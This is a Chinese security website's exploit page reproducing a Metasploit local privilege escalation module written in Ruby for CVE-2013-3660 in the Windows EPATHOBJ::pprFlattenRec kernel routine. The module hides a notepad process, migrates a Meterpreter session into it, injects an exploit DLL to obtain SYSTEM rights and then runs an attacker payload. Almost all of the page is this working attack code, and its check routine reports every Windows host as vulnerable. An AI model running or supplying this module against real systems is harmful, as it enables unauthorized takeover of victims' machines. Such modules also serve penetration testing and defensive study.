首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
来源:metasploit.com 作者:Keebie4e 发布时间:2013-07-02  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
	Rank = AverageRanking

	include Msf::Post::File
	include Msf::Post::Windows::Priv
	include Msf::Post::Windows::Process

	def initialize(info={})
		super(update_info(info, {
			'Name'           => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
			'Description'    => %q{
					This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
				of uninitialized data which allows to corrupt memory. At the moment, the module has
				been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
					'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
					'Keebie4e',    # Metasploit integration
					'egypt',       # Metasploit integration
					'sinn3r',      # Metasploit integration
					'Meatballs',   # Metasploit integration
					'juan vazquez' # Metasploit integration
				],
			'Arch'           => ARCH_X86,
			'Platform'       => 'win',
			'SessionTypes'   => [ 'meterpreter' ],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'Payload'        =>
				{
					'Space'       => 4096,
					'DisableNops' => true
				},
			'References'     =>
				[
					[ 'CVE', '2013-3660' ],
					[ 'EDB', '25912' ],
					[ 'OSVDB', '93539' ],
					[ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
				],
			'DisclosureDate' => 'May 15 2013',
			'DefaultTarget'  => 0
		}))

	end

	def check
		os = sysinfo["OS"]
		if os =~ /windows/i
			return Exploit::CheckCode::Vulnerable
		end
	end

	def exploit

		if sysinfo["Architecture"] =~ /wow64/i
			fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported")
		elsif sysinfo["Architecture"] =~ /x64/
			fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported")
		end

		print_status("Creating a new process and migrating...")

		cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
		new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
		new_pid = new_proc.pid

		if not new_pid
			print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
		else
			print_status("Migrating to #{new_pid}")
			migrate_res = false

			begin
				migrate_res = session.core.migrate(new_pid)
			rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
				migrate_res = false
			end

			if migrate_res
				print_good("Successfully migrated to process #{new_pid}")
			else
				print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
			end
		end

		print_status("Trying to load the exploit and executing...")

		session.core.load_library({
			"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
			"UploadLibrary"   => true,
			"Extension"       => false,
			"TargetFilePath"  => "#{rand_text_alpha(5 + rand(3))}.dll",
			"SaveToDisk"      => false
		})

		print_status("Checking privileges after exploitation...")

		if is_system?
			print_good("Exploitation successful!")
		else
			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
		end

		if execute_shellcode(payload.encoded)
			print_good("Enjoy!")
		else
			fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
		end

	end


end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AudioCoder (.lst) - Buffer Ove
·WinAmp 5.63 - Invalid Pointer
·Static HTTP Server 1.0 - SEH O
·WinAmp 5.63 - Stack-based Buff
·AVS Media Player 4.1.11.100 (.
·FileCOPA 7.01 Denial Of Servic
·Bifrost 1.2.1 - Remote Buffer
·ABBS Audio Media Player .LST B
·Bifrost 1.2d - Remote Buffer O
·Realtek Sound Manager AvRack (
·Carberp Web Panel C2 Backdoor
·Nokia 1280 Denial Of Service
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved